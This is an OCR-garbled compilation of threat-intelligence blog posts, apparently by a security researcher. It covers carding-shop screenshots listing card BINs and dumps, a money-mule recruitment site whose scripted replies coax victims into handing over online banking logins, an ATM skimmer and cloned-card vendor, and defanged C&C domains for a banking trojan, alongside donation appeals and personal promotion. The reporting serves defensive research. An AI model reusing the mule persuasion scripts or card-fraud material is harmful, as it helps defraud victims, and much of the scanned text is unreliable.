ase CONSUMER ATES Seller: ShadoWeb fae $23.50 +400 
LENDING ) Address, Phone, Email, 1P 
© Address, SSN, MMN, DOB 
Add 
DEBIT BOFI FEDERAL UNITED Refundable — 
| 2 PREPAID BANK one4 72901 states Seller: SadoWeb — $21.80 ADD 
RELOADABLE \ 
498503 BANCO 
INTERAMERICANO Refundable 
DEBIT DE FINANZAS 1S TEPER Seller: Shadowed  *8dress $20.30 ADD 
CLASSIC. waskwa 
[7] 
Search BIN Search ZIP 
Search Q Search Q 
| wan | ne = 
MARK BIN BANK = - REFUND/SELLER = Sor'S PRICE. CART 
© ALBANIA 
377278 — 
mm CREDIT AMERICA =© ANTIGUAAND BARBUDA Refundable al | +ao0 | 
2 CONSUMER USCONS Seller: ShadoWeb pay $23.50 +A00 | 
LENDING © Argentina . 
© ARMENIA 
Addr: 
DEBIT BOFIFED! © Aruba Refundable = [ soo | 
| 2] PREPAID BANK Seller: SnadoWeb ay $21.80 100 
RELOADABLE © AUSTRALIA , 
2 AUSTRIA 
oa Refundable 
0 \ 
DEBIT pereag  ACERBAUAN Sdler:Shadowen 9 00r85S $20.30 


[8] 
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DUMPS $0.00 


Search BIN Search ZIP 
n| Ss Q 
Mark ¥ BANK Tags ¥ Country ¥ CODE v Reset 
MARK BIN BANK EXP TRACK1 CODE zip COUNTRY 
467109 
VISA BANCO DEL NUEVO MUNDO 046/23 201 PERU 
CREDIT CLASSIC 
a WELLS FARGO BANK 10/26 201 UNITED STATE: 
DEBIT CLASSIC 
506762 
| 2] 02/24 606 
ms 514086 = = 
peda BANCO DELNUEVO MUNDO 06/23 201 PERU 
CREDIT CLASSIC 
— WELLS FARGO BANK 10/26 201 UNITED STATE 
DEBIT CLASSIC 
506762 
| 2) o2rea 60s 
514086 
| 2) : BANCO DO BRASIL SA. 06/25 206 BRAZIL 
— PT. IPPOBANK 06/24 201 INDONESIA 
CREDIT N/A 7 
§52433 
DH BANK OF AMERICA 05/24 201 UNITED STATE 
CREDIT 
one] os BANK OF BAHAMAS 02/2025 201 BAHAMAS 
CREDIT N/A 
H §59758 NAA 05/24 201 UNITED STATE 
CREDIT N/A 


Stay tuned! 
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U80J3Ge_uAqOvtapQwqC1 THVBCo6p3SAdudIY2sBLojAvT9QsVmL2 
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LKEplug7kh44yRBpngmQQO0kcF6 1wok40rCr2Z2Rt X6kEW55 j 9SMCLj 
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Coir 


19.3.11 Who Wants to Fuel Independent and High Quality OSINT/Cybercrime and 
Threat Intelligence Research? Accepting BitCoin Donations (2023-03-18 21:57) 


[1] 
Background 


| was born in Sofia, Bulgaria. My primary area of 
occupation since the early 90's is computers. My 
primary work is Disruptive individual's Chief 
Executive Officer (CEO) 


yPercrime Kesearcher 


| ESS eters Sete neeenner ers meates enema | 
Dancho | Tren Neogene yer | 
Danchev Executive BIO 


Warlndustries - Member 

BlackCode Ravers - Member 

Black Sun Research Facility - Contributor 
DiamondCs - List Moderator/Software Contributor 
LockDownCorp - Help Trojan Database Contributor 
Forbidden HelpNetSecurity - Contributor 
Astalavista Security Group - Managing Director 
Frame4 Security Systems - Contributor 
TechGenix - WindowSecurity - Contributor 

ZDNet Zero Day - Security Blogger 

Webroot Threat Blog - Security Blogger 


Conference and Events - Media and Press Coverage 


Dancho Danchev is the world’s leading expert in the field of cybercrime fighting and threat intelligence gathering 
having actively pioneered his own methodlogy for processing threat intelligence leading to a successful set of 
hundreas of high-quality anaysis and research articles published at the industry's leading threat intelligence blog - 
ZDNet's Zero Day, Dancho Danchev's Mind Streams of Information Security Knowledge and Webroot's Threat 
Biog with his research featured in Techmeme, ZDNet, CNN, PCWorld, SCMagazine, TheRegister, NYTimes, CNET, 
ComputerWorld, H+Magazine currently producing threat intelligence at the industry's leading threat intelligence 
blog - Dancho Danchev's - Mind Streams of Information Security Knowledge 


With his research featured at RSA Europe, CyberCamp, InfoSec, GCHQ and Interpol the researcher continues to 
actively produce threat intelligence at the industry's leading threat intelligence blog - Dancho Danchev's - 
MinStreams of Information Security Knowledge publishing a diverse set of hundreds of high-quality research 
analysis detailing the malicious and fraudulent activities at nation-state and malicious actors across the globe 
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Dear blog readers, 


Did you already grab a copy of my 2019-2023 "[2]Dancho Danchev’s Blog - Mind Streams of 
Information Security Knowledge" Ebook which is 1.7GB compilation for free? Did you already 
grab a copy of my [3] Twitter 2017-2023 Ebook compilation for free? Did you already grab a 
copy of all of my WhoisXML API white papers which | produced during the past year and a 
half [4]nere? Have you also downloaded my Cybercrime Forum Data Set for 2022 including 
a free 256GB compilation of all of my publicly accessible research from 2005 up to 2023 for 
free in the form of a [5]torrent? Have you also grabbed a copy of all of my publicly accessible 
research from 2005 up to 2023 from [6]here for free? Did you also grab a copy of my memoir 
from [7]here including a version in Bulgarian from [8]here? Did you also grab a copy of my 230 
pages cyber threat actors compilation from [9]here? Did you also grab a copy of my Maltego 
training videos from [10]here? Did you also grab a copy of my latest video presentation at 
Cyber Security Talks Bulgaria from [11]here? 


After a bit of thinking and personal decision making I’ve decided to begin soliciting free Bit- 
coin donations using address - 15Zvielj8CjSR52doVSZSjctCDSx3pDjKZ where every amount 
donated will go for me which I'll use to pay my bills including to maintain a decent living in 
the form of taking care of my family and folks in terms of expenses and most importantly fuel 
growth in the form of my research in the form of securing a decent revenue stream that will 
be a personal privilege in the form of receiving it as a donation to keep my research keep and 
running on a daily basis as I’ve done so as of December, 2005 up to present day in March, 
2023. 


Here’s what you can do in order to help me fuel growth into my research on a daily basis and 
help me pay the bills and assist me family with bills and expenses including to maintain a 
decent living in the form of being a noteworthy and a bit popular security researcher: 


* Donate using my _- permanent’ Bitcoin donation address’ which is~ - 
15Zvielj8CjSR52doVSZSjctCDSx3pDjKZ 


¢ Do it as long as you feel like doing it including as many times and whenever you feel like 
doing it as it really help me a lot in terms of paying my bills and assisting my family with 
bills and expenses 


[12] 


itcoin 


Thanks for your donation! 


Sample photos include: 


[13] 
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their online banking account so that the organization can monitor the transaction process 
remotely. It doesn’t take a rocket scientist to conclude that even with a two-factor authen- 
tication requirement there are ways in which the organization can hijack the entire financial 
identity of the money mule without his/her knowledge. 


@2=O@2O@2020 


I'm feeling uncomfortable giving you my online banking details. Why do you need it? I'm worrying about unauthorized access to my 
bank account. 


We require online banking access to monitor deposits coming from our clients. It saves you much time and increase your rating in ou 
syster 


There is no need to check your bank account every hour during transactions, your personal supervis will do it instead of you! You'll be informed 
the same minute funds arrive 

No need to send us your bank account statement every week (maybe 2-2 times a weet 

We trust you much more, you'll receive money bonuses and more transactions 
u will stay safe. Please read our Privacy Policy. NOTE: IT'S 
IMPOSSIBLE TO MAKE ANY TRANSFERS USING ONLINE ACCESS. If you have no online access to your bank account, you should contact 


Online Banking Details 

URL: http:// 
Login: 

Password: 


Next Step Skip This Step Back 


* At this moment we require online access to your bank account optionally but strongly recommend to apply with online banking 
details. NOTE: 


® agents with online access will have higher priority on getting new tasks (amounts are also larger) 
@ agents with online access receive $100 BONUS to base salary every month 


Again, they answer to a common question even the most gullible end user would have - I|’m 
feeling uncomfortable giving you my online banking details. Why do you need it? I’m worrying 
about unauthorized access to my bank account. A question to which they answer by citing 
increasing bonus rating within their system, and that your supervisor will be checking your 
account, thereby improving your trust relationship with the organization: 


"We require online banking access to monitor deposits coming from our clients. It saves 
you much time and increase your rating in our system: 

- There is no need to check your bank account every hour during transactions, your personal 
supervisor will do it instead of you! You'll be informed the same minute funds arrive. 

- No need to send us your bank account statement every week (maybe 2-3 times a week). 

- We trust you much more, you’ll receive money bonuses and more transactions! 


It is absolutely safe and legal. We guarantee that all personal details will stay safe. Please 
read our Privacy Policy. NOTE: IT’S IMPOSSIBLE TO MAKE ANY TRANSFERS USING ONLINE 
ACCESS. If you have no online access to your bank account, you should contact your bank and 
activate this service. It will take less than 10 minutes." 


The very idea that the money mule has reached the tipping point of its gullibility in or- 
der to provide the organization with access to their bank account is surreal, but clearly 
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Aggregate Item Use Show stats for [alltime >] 


2010 2015 


Wednesday, December 14, 2005 — Saturday, September 14, 2019 


* 2,572,020 Views of 1038 items 
. 6,497,440 ClickS back to the site on 1217 items 


[14] 


Dancho Danchev's Blog - Mind Streams of Information Security Knowledge 
Views 
150K 
125K 
5.36M & 


100K 


75K 
50K 08 


25K 


Jan2011. Jan Jan Jan Jan Jan Jan Jan Jan 
2012 2013 2014 2015 2016 2017 2018 2019 
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Feed Stats Dashboard Show stats for [alltime >] 


12000 1600 
9000 1200 
6000 800 
3000 400 
0 0 
2010 2015 
Wednesday, December 14, 2005 — Saturday, September 14, 2019 
+ 2,888 subscribers (on average) @ 
¢ 457 reach (on average) @ 
See more about your subscribers » 
Popular Feed Items 
NAME VIEWS CLICKS 
Total 1,557,394 6,377,221 
Historical OSINT - Malicious Malvertising Campaig... 1463 71028 
Historical OSINT - Massive Black Hat SEO Campaign... 1397 70766 
Historical OSINT - Google Docs Hosted Rogue Chrom... 1402 70669 


See more about your feed items » 
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NORTH ATLANTIC 
OCEAN 


NORTH PACIFIC 
OCEAN 


SOUTH PACKIC 


OCEAN SOUTH ATLANTIC 


OCEAN INDIAN OCEAN 
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[19] 


1429 8 & © - Mot Ae 


February 15, 2011 


SC Social Media 
Awards 
OOO0O0O 
Best Security Blogger: Graham Cluley, senior 


technology consultant at Sophos, for the Naked 
Security Blog 


Best Corporate Security Blog: Trend Micro's 
TrendLabs Malware Blog 


Five to Follow on Twitter: 


© @cyberwar and @stiennon (Richard Stennon, 
chief research analyst of IT-Harvest) 

¢ @George KurtzCTO (George Kurtz, worldwide 
CTO of McAfee) 

e @danchodanchev (Dancho Danchev, 
independent security consultant) 

* @jeremiahg jeremiah Grossman, founder 
and CTO of WhiteHat Security) 

© @owasp (the Open Web Application Security 
Project) 


NEXT POST IN EVENTS 


RSA Conference 2011: Terrorist organizations pose great« 
cyberthreat 
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R.1.P Dancho Danchev? 
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DY Dancho Danchey 


Dancho Danchev's Blog - 
Official E-Book 
Compilation Archive - 
2019 - 2023 


Nttps://ddanchev blogspot.com 
Email: dancho danchev@hush.com 


[24] 


So, what this means Is that any individual's success in the industry comes down to things like reputation, how well you 
can bullshit, etc. But ultimately we have no way to differentiate, say, Bruce Schneier, who has a long academic- and 
professional-grade track record and a habit of writing in a highly intellectual fashion on difficult topics, from Dancho 
Danchev, who is a random Russian dude very few people know anything about, who posts random snippets of facts that 
pass for “analysis.” 


[25] 
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possible since having reached point of the registration process means they have absolutely 
no idea what they’re doing. 


The following are sample screenshots from the web interface used by the organization 
and the money mules themselves: 


You have new message. Read Q John Blackmore 


Tasks Messages | My money My Profile | Documents | Officialinvoices | Help Quit 


@ MY TASKS 


a 


ard Transaction 136387 NEW Open High Oraaectn Comment by Admin 


@ COMPLETE TASK 


a 


09.01.2009 7 
% Transaction 126357 Open High 1.3810 Comment by Admin 


Further instructions > 


Dear John Blackmore, 


We are glad to inform you about new task! Please review transfer details: 
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Russian OSINT 4 


VnTepsbto c OSINT cneumanuctom flaHyo 
Jianyespiom. He Ha Bce BONpOCbI yAaNnocb 
NONYYUTb PasBepHyTbie OTBETbI, HO B 
UeNOM NOCbIN NOHATeH. Ku6epKpalim 
nporpeccupyer, ransomware rnaBHblit 
TpeHg 2021 roga, a CLUA no-npexHemy 
HaXOAMTCA B KOHTpax C Poccuei. 
Cogep>kaHve WHTepBbtO: 


= Kto taxon Jlanuo? 

= 4Yem OH 3HAaMeHMT? 

= Pa6ota Ha U.S Law Enforcement u U.S 
Intelligence Community 

> OSINT onepauna “Uncle George” 

= Cybercrime Forum Data Set Ha 16 16 
=» Ransomware # Darkweb 

> Npn6binb REvil 

> “PoccHua OCTaeTCA rnaBHbiM 
paccaguuKom Ku6epnpectynHocTn” 

> Ku6epnpectynHoctTb B CHT 


https://telegra.ph/Intervyu-s-hakerom- 
Dancho-Danchev-04-12 


Telegraph 

Vntepppw c GonrapceKum xakepom 
fanso Jlanvesbim cneynanbHo 
ana Russian OSINT: Kn6epxpaim B 
2021 

Vima: flanuo flaxyes / Dancho Danchev Pog 
3aHATHA: MB uccnegoBarenb, OSINT 
cneuvanncr Cneynannaayna: Kn6epKpaim, 
Darknet && OSINT Crpana: Bonrapua Caftr: 
ddanchev.blogspot.com Twitter: 
https://twitter.com/dancho_danchev Russian 
OSINT: lanyo, pacckaxki HEMHOTO... 


TI GY Ane i2a4t 14:64 


VIEW IN CHANNEL 
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Ha LOVELY HORSE @ 
@lovelyhorse curr srace 


Man, 
2 NetCs; 
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Tweet 


tbh, | don't understand what's the purpose 
of this now ?!!7 securityboulevard.com/ 
2021/09/exposi... 


= Roman Medina-Heigl Hernandez - 2d 


29a was a well-known and respected group 
in da viri scene... 2 decades ago!! More info 
(spanish): hackstory.net/29A 


securityboulevard.com 
Exposing 29A Virus Coding Group - An 
OSINT Analysis 


© 10 t2 13 © 38 « 


Julio @juliocesarfort - 1d 

2 it's just Dancho Danchev trying to make a 
comeback after years out of the spotlight 
and battling with mental health issues. i 


can't help but think what terrible doxxing 
skills he's got... 


Ov tl 1 C1 «e 
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18:54 8 @ eo" 40 
< Tweet 


t You Retweeted 


TN} NETRESEC v 
IN @netresec 


Our #SUNBURST STAGE2 Victim 
Table (orgs actively targeted by the 
threat actor) has now been updated 
to include “paloaltonetworks*". 

The internal AD domain for GUID 
22334A7227544B1E was discovered 
in passive DNS data published by 
@dancho_danchev. 


oun avsvencioud.com Timestamp AD Domain 

POGPAFELIESIO7AL — AntvteSqmor7/Mpegat 2020.05-30 
“4a 

AOPLOLIEWICION «= PabrewerscsOenc HISD penton contad pima gov 

PROGOONATEAS629 = gqineséseaggnsamcgn oe I Contial pana gov 
08:30 

FOOTE SSAC OO MLE GaSJyrnaloterg Seng 2070-05-13 Central pena gov 
ono 

DOTOESERISTIAIF? twp qvOpwqpatoTre aem-es-20 commet cox com 


ZBMATRTS4ABLE — SqngO4echpGugtinotr 


Tweet your reply (6) 
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GRIEFER 


DANCHO DANCHEV 
SUCK MY DICK 
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V=REiv 


Fy Srottome PS Viecorsmes @Aople BB uicrosoh (Goose & Prices and Rates [smartphone Gr Web and Social GE Tomorrow gai Engines 
iPhone 12  Onlineshopping FWA Artificialintelligence PSS XboxSeriesX SPID 3Dprinters Netflix 5G 


Who framed Dancho Danchev? 


Dancho Danchev, a Russian researcher known for his work against malware, has been missing since 
October and has never been heard of again. 


ac prpwWspi=s 
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Q = @ humwikipedia.org/wiki/Astala © 


Astalavista. box.sk 


Page type search engine 
Categories search page 
Available language (s) English 
Establishment 1994 
Editor-in-Chief Dancho Danchev 
URL box.sk @ 


The website operated under a Slovak domain name . 
The name of the website is based on a movie pun. In 
the sci-fi action movie Terminator 2 - The Day of 
Judgment , the protagonist's character had a 
memorable phrase, “Hasta la vista, baby,” a phrase in 
Spanish that is a commonly used farewell formula. 
The “astalavista" of this sentence is the merging of 
the player. It's worth noting that AltaVista , another 
well-known search engine of the era that sounded 
similar , was only launched in 1995, “! 

In December 2020, cybercrime researcher and 
analyst Dancho Danchey, as the operator of the site, 
announced the relaunch of the website under the 
domain name box.sk. It is designed to support 
hackers and cybersecurity experts. !"! 


v Notes 


v Translation 


Be HUNGARIAN ENGLISH ; x 


[35] 


It would be really an honor and a privilege to get my first and continuous Bitcoin donation 
revenue stream up and running as of today and it would really help me a lot to pay the bills 
and assist my family with bills and expenses. 


Stay tuned! 


1. https: //blogger . googleusercontent .com/img/b/R29VZ2x1/AVvXsEj eoGgC- XXwBaGkqrhf BS5Mg4UZbLUsXIsr-1luqUckLew5zt 
SGsM8kiYNao9yA5H2dYvXwfoHFu0UbY7 Yu_6IPyxikF5ZenvKp1UmM 
. https://archive.org/details/dancho-danchev-blog-ebook- 2019- 2023-02 


N 


https://archive.org/details/dancho-danchev-twitter-ebook-archive-02 


https: //archive.org/details/dancho-danchev-whois-xml-api-maltego-bulletproof-infrastructure-2 
https://drive.google.com/file/d/1AeL46L150xZTwx4MiLZTgb2CTnPOf 8fz/view?usp=sharing 


. https://archive.org/details/@ddanche 
. https: //archive.org/details/cyber-intelligence_20210817 


oN AM Aw 


https://archive.org/details/dancho-danchev-kiber-razuznavane-audio-kniga-01-memoa 
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9. https: //archive.org/details/dancho-danchev-cyber-threat-actors-analysis-2021-2 
10. 
. https://archive.org/details/dancho-danchev-cyber-security-talks—bulgaria-2022-video-presentation-01 
. bitcoin:15Zvie1j8CjSR52doVSZSj ctCDSx3pDjKZ?message=Dancho/20Danchev/,27s/,20Blog 

13. 
5irUIOARZwC1JmHYvUqiX6-8nm7hbeTMLuLT3HNeKgolg_t_2KNqBbQ 
4. https://blogger.googleusercontent.com/img/b/R29VZ2x1/AVVXsEib94aehsVBCpX6ND1xmwpKn7x0vwzyH5U_vYTFWh1a95 
nL_Qwes jPuylqNW8Ne_PJEdO65ChOwmt 8v1RSGNHKMi XNk61eZoC8- 
15. 
X29h9Uequ- grfiHGDkEOcAYqN8x7rr7-YczbrXXhZd1_w58SrenwxKV 
16. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVvXsEi_6Pen6qFQznhTQ184V2REAfk-afE_sKNLDKCS70dFb1 
aRS6G95R£-1GF2LpJA8uiNkeaCRwnk1d_pQn3X30xAnU4gZYftah-e0b 
17. https://blogger . googleusercontent.com/img/b/R29vZ2x1/AVVXsEhD1xwGHUMDAXUvYOaPq8H80sFdHhaZc5NdUfrij8z8x1 
yC10zZeEIPD17e8EnUb7NTncXdQhtEQBpc-9XeC9tUrK1Wtg0eF40-Gk4 

ttps://blogger. googleusercontent.com/img/b/R29vZ2x1/AVvXsEhsSzoiH3Gaoo00AZy1LANigB1bMikMhHg9eTXVZTVSM77 
Nja7cZPjEwrrbwkHNohIr9y1iDXxrzw5gbg1Vo9ptWDeLKORGo7FazBi 

ttps://blogger. googleusercontent.com/img/b/R29vZ2x1/AVvXsEheQAQ0iN5ncmnf vMXp_1aU4snEDi1UmYJ-hW_U8LIWuC 
jaA2BnYSS-78RKQykGmXbuSvWOMogtL6qtVsSUfr9V6yDbUjry1lEOMI 
20. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVVXsEj qRMm9adBtQyllw-m3e3Md-knghVmJ_5-mcibgSNPTMt 
HNoj2YkPhi6CpnTAKRsU2oMviCLP_WU_vQ-66xWCTPEcs8mBWSYItTa 

ttps://blogger. googleusercontent.com/img/b/R29vZ2x1/AVvXsEjSovWm9F1tW2wCvseHv-fpz5bTmUYOfTv-GdrMhyQZ06B 

4E_7ScPtGLv jdqfWu7BsMwjU7VAW- 3u0kJP1S4hy1liEFAbFtGw_m-DFj 
2. hhttps://blogger.googleusercontent .com/img/b/R29vZ2x1/AVvXsEg51YiJVvlkcAatPp61abNmD3-3U8k16mdN9MOgYuTUDU- 
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Western Union orders details > 


Transfer type: Western Union 


First Name: 


Last Name: 


City: 


Country: Serma 
Reference Number (MTCN)*: 908 || 547 || 5754) ? 


Western Union fee (USO)*: 600] 


Employee details > 


First Name*: | John 


Last Name*: Blackmore 


City*: New York 


Country*: United States 


@ COMPLETED TASKS 


P 09.01.2009 = 
Done High 18:46:50 Comment by Admin 


09,01.2009 
18:45:18 


No comment 


Done High 


CG) VIEW MESSAGE 


Message From/ Date (GMT)> Message Text> 


Supervisor Welcome! 
09.01.2009 18:49:39 Dear John Blackmore. 


We welcome you as 8 new employee. 


Sincerely, 
Personnel Supervisor 


Moreover, sample agreement that each and every money mule has to accepted before 
becoming part of the money mule recruitment network. A second agreement contract 
containing unique (Photoshop-ed) signing seal for each of the bogus brands has to be also 
signed, scanned and uploaded through their interface. Both of these agreements, including 
localized copies in several different languages can be purchased from the managed money 
mule recruitment vendor from $30 to $70. Here’s a sample of the agreement and tag clouds 
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19.3.12 Profiling a New Vendor of ATM Skimming Devices and Stolen Credit Cards 
Information On A Major Cybercrime-Friendly Forum Community - Part Two - 


An Analysis (2023-03-19 11:05) 


[1] 


I’ve recently came across to a currently active underground marketplace forum proposition 
that’s basically offering and selling ATM skimming devices and stolen credit cards information 
where the seller of the devices and the information is basically offering a variety of screenshots 


to demonstrate the existence of the service. 


Sample screenshots include: 


[2] 
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Print or 


Barcode Mark 


OCR 


[3] 
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OQ. i x | 


GLOBAL SEARCH shaw less 


‘ 217 subscribers 


37 subscribers 


[4] 
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690 9551 
VISA > 


GOLD CARD 


S591 6329 9174 8454 
VISA 


ob cars 


VISA | oe VISA 
GOLD CARD. » ( BLACK CARD 


VISA } 


BLACK CAKDL ; ITANIUM C 


BLACK CAKD 


virion 
yam © 
GOLO CARO. BLACK CARO 
343 
3021 2521 1115 S13) 


wee 


GULLY Ve ene 


5446 6134 4919 Obse 
VISA 


ARD. 


[5] 
26766 


Cloned Cards 
(Physical & Shipped) 


Cloned Cards’ are in-house manufactured 
physical cards based on s f 


collect from our network, this data is collected off 
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Mid Balance Cards 
— $260.00/Bitcoin 


High Batance Cards 
— $400.00/Bitcoin 


Super-High Balance 
Cards — $875.00/Bitcoin 


SPECIFICATIONS 


[6] 
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Ordering Procedure 


— 4 
. 
a 
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Frequently Asked Questions 


Contact Us Now 
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19.3.13_ The OPSEC Infrastructure of the Infamous LATAM Astaroth Banking Trojan - 
An OSINT Analysis (2023-03-24 19:51) 


@ 


vicknet@tutanota.com 


[1] 


Here’s how to take it offline. 


Grab any public OSINT list and process all the domains in terms of looking for personally 
identifiable information 


¢ Figure out what’s the personally identifiable information which is this case 
is basically a Tutanota (vicknet@tutanota.com) and a Protonmail (bestchoice- 
firstchoice@protonmail.com) email address account 


¢ A screenshot is worth a thousand words 


Publish and disseminate all the loCs in a easy to distribute and work on form 


Approach the domain registrant’s hosting provider the let them know the good news 


[2] 
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@ 


bestchoicefirstchoice@protonmai... 


Related loCs and C &C server domains include: 


hxxp://joaquinasocorrolisboa[.]quest 
hxxp://wanio[.]one 
hxxp://xuasou[.]one 
hxxp://manageboard[. ]cfd 
hxxp://managemind12[.]link 
hxxp://managemodel12[.]one 
hxxp://acciolddehol[.]yachts 
hxxp://administrativomail[.]top 
hxxp://administra12[.lone 
hxxp://administrify[.]mom 
hxxp://administrtrix[.] mom 
hxxp://corporatedb12[.]one 
hxxp://corporatehr12[.]Jmom 
hxxp://corporatevip12[.]Jmom 
hxxp://counselone12[.]one 
hxxp://counselwise12[.]cfd 
hxxp://courtgranted[.lone 
hxxp://courtordered[.]mom 
hxxp://directorial12[.]link 
hxxp://directorlaw12[.]cfd 
hxxp://executivexyz[.]cfd 
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hxxp://executiviol2[.]Jmom 
hxxp://executivu12[.]one 
hxxp://judicialtool[.]link 
hxxp://judicialways[.]cfd 
hxxp://lawconsult12[. ]link 
hxxp://lawsuitfiled[.]cfd 
hxxp://lawsuitnow12[.]cfd 
hxxp://lawsuitzone[. ]link 
hxxp://legaladjunct[.]cfd 
hxxp://legalblazer12[.]cfd 
hxxp://legalbriefs12[.]Jmom 
hxxp://litigate247[.]Jmom 
hxxp://litigates12[.]one 
hxxp://litigatior12[.]link 
hxxp://brighaccio[.]yachts 
hxxp://natyer[.Jone 
hxxp://docliberadodig2023[.]cloud 
hxxp://docliberadodigonline2023[.]top 
hxxp://documentolicenciadoaqui23[.]top 
hxxp://gestoesdedocsdigitais2023[.]top 
hxxp://imprimirdocdigital2023[.]top 
hxxp://licenciamentoativo2023[.]top 
hxxp://facegatoresnetc[.]sbs 
hxxp://facegatoresnetd[.]sbs 
hxxp://facegatoresnete[.]sbs 
hxxp://cashprincipall.]click 
hxxp://empoderadas[. Jclick 
hxxp://escriturario[.]us 
hxxp://financialbom[.]us 
hxxp://masteroso[.]us 
hxxp://sistemaonpipe[.]cloud 
hxxp://sistemaonpipe|[.]top 
hxxp://olviodinissimes[. ]hair 
hxxp://pviwerbgierbnkdf[.]Jmom 
hxxp://screamoakbornsummer[.]mom 
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for the company description, the agreement itself and the FAQ: 


Contractor's 
1... 


Bited ss GOnnection terms ~ 
without dues" 


new , Ptsnal "processing “ise agrees 


written 


manager 


DUTIES: 

The Contractor undertakes the responsibility to receive payments from the Clients of the Com- 
pany to his personal bank account, withdraw cash and to effect payments to the Company’s 
partners by Western Union or MoneyGram money transfer system within one (1) day. He/she 
will report directly to the senior manager and to any other party designated by the senior 
manager in connection with the performance of the duties under this Agreement and shall 
fulfill any other duties reasonably requested by the Company and agreed to by the Contractor. 


CONFIDENTIALITY: 

The Contractor acknowledges that during the engagement he will have access to and be- 
come acquainted with various trade secrets, inventions, innovations, processes, information, 
records and specications owned or licensed by the Company and/or used by the Company 
in connection with the operation of its business including, without limitation, the Company’s 
business and product processes, methods, customer lists, accounts and procedures. The 
Contractor agrees that he will not disclose any of the aforesaid, directly or indirectly, or 
use any of them in any manner, either during the term of this Agreement or at any time 
thereafter. All les, records, documents, blueprints, specications, information, letters, notes, 
media lists, original artwork/creative, notebooks, and similar items relating to the business of 
the Company, whether prepared by the Contractor or otherwise coming into his possession, 
shall remain the exclusive property of the Company. 


The Contractor shall not retain any copies of the foregoing without the Company’s prior 
written permission. The Contractor further agrees that he will not disclose his retention as 
an independent contractor or the terms of this. Agreement to any person without the prior 
written consent of the Company and shall at all times preserve the condential nature of his 
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hxxp://ofwierufbweriubo[.]pics 
hxxp://ongaixi[.Jone 
hxxp://ascudeu[.]one 
hxxp://ceywu[.Jone 
hxxp://dexoyful[.]one 
hxxp://gevues[.]one 
hxxp://gipoadu[.]one 
hxxp://maquiagemlindal[.] makeup 
hxxp://duall[.]Jrest 

hxxp://geez[.]rest 
hxxp://bryanerosagraficaltdal[.]cloud 
hxxp://esterekauetelecomme|[.]cloud 


hxxp://felipeefilipetelasme[.]Jicu 


hxxp://nhugoeyagomudancasltda[.]online 
hxxp://lauraebeneditolavanderialtda[.Jonline 


hxxp://mirellaetomaseletronicame[.]site 


hxxp://representanteseliase[.]icu 
hxxp://thalesebryanpadariame[.]site 
hxxp://hipermax[.]com[.]de 
hxxp://eyehairbitter[.]makeup 
hxxp://comunicwebemailsx[.]works 
hxxp://befaufe[.Jone 
hxxp://brovies[.]one 
hxxp://duizyovu[.]makeup 
hxxp://feohoyha[.]makeup 
hxxp://fuecobe[.]one 
hxxp://fyuxior[.]one 
hxxp://geblebou[.Jone 
hxxp://neweukan[.]makeup 
hxxp://huydezon[.]one 
hxxp://oticascarol[. ]live 
hxxp://isabelrodriguesbemarius[.]one 
hxxp://klipvirtual[.]autos 
hxxp://limabitco[.Jone 


hxxp://marcosjoaquimcortereall[.]hair 
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hxxp://machivautoss[.]cloud 
hxxp://poxakien[.]one 
hxxp://ketyasas[.]lone 
hxxp://panuaxe[.]one 
hxxp://modaebelezal[.]Jmakeup 
hxxp://whoal.]rest 

hxxp://down[. ]rest 
hxxp://achievecidadenovaf[. Jonline 
hxxp://andersonmatal[.]xyz 
hxxp://appacoaserv[.]yachts 
hxxp://assibraff[. network 
hxxp://assistenteonline[.]top 
hxxp://atendimentoaocliente[.]top 
hxxp://bohleruddeh[.]yachts 
hxxp://calteclink[. ]network 
hxxp://contratobrs[.]top 
hxxp://espacorafah[. ]network 
hxxp://gerentedeatendimento[. top 
hxxp://requerimento[.]top 
hxxp://erickelorenapizzariadeliveryme[.]cyou 
hxxp://emanuellyrebecabaptistagap[.]bond 
hxxp://tuhomolciamonteirounimeda[. ]top 
hxxp://vitoriaeyuripublicidadeepropagandaltda[.]hair 
hxxp://vayxitasengemed[. ]click 
hxxp://queratinaintensiva[.]makeup 
hxxp://salaodebelezamasculino[.]makeup 
hxxp://selagemmodeladora[.]makeup 
hxxp://selagemsemformol[.]makeup 
hxxp://botoxintensivo[.]beauty 
hxxp://esmaltesetintas[.]beauty 
hxxp://esmaltesetintas[.]makeup 
hxxp://ligadoscampeoes|[. ]beauty 
hxxp://ligadoscampeoes[.]makeup 
hxxp://modafashionsingle[.]beauty 
hxxp://modafashionsingle[.]makeup 
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hxxp://belasmusasbrasil[.] makeup 
hxxp://belezasemlimites[.]beauty 
hxxp://belezasemlimites[.]makeup 
hxxp://pale[.]rest 
hxxp://ding[.]rest 
hxxp://phew[.]rest 
hxxp://counselable12[.]mom 
hxxp://counselmark12[.]mom 
hxxp://courtjustice[.]cfd 
hxxp://courtlistener[.]mom 
hxxp://directorace12[. cfd 
hxxp://directorco12[.]one 
hxxp://directornew0O7[.Jone 
hxxp://executivus12[.]Jmom 
hxxp://judicialgear[.Jone 
hxxp://judicialside[.]cfd 
hxxp://juridicallaw[.]cfd 
hxxp://lawwhizkid12[.]link 
hxxp://managegoal12[. ]link 
hxxp://administrand[. ]link 
hxxp://administrise[.]one 
hxxp://corporateace12[.]Jmom 
hxxp://gestaodocenviodiario[.]co 
hxxp://gestaodeenviosfiscais[.]cloud 
hxxp://enivoscopemails[.]cloud 
hxxp://nfedigviamail[.]cloud 
hxxp://litigatesy12[.]Jmom 
hxxp://setornfeviaemaill[.]Jcloud 
hxxp://propostasbrasilacordos[.]cloud 
hxxp://gestaodedadoscx[.]Japp 
hxxp://gestaocopemails[.]cloud 
hxxp://pfft[.]rest 
hxxp://queratinaintensal[.]makeup 
hxxp://cabelossedosos[.]makeup 


hxxp://cachosresistentes[.]makeup 
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hxxp://ciliosalongados[.]makeup 
hxxp://coloracaointensal[.]makeup 
hxxp://bolsasonline[.]makeup 
hxxp://seudocumento2023ativo[.]cloud 
hxxp://seudocumento2023liberado[.]top 
hxxp://visualizar2023online[.]cloud 
hxxp://visualizarlicen2023[.]cloud 
hxxp://executivnet12[.]mom 
hxxp://systemnews0O01[.]cloud 
hxxp://systemnewsO1[. ]top 
hxxp://gestaoonvision[.]cloud 
hxxp://gestaoonvision[.]top 
hxxp://servicesytemnewl. ]cloud 
hxxp://wildly[.]Jcyou 
hxxp://manosejaforte[.]makeup 
hxxp://produtosagricolas[.]yachts 
hxxp://mournsteelhawktongue[.]mom 
hxxp://ofwejfiowerubfirewubil.]mom 
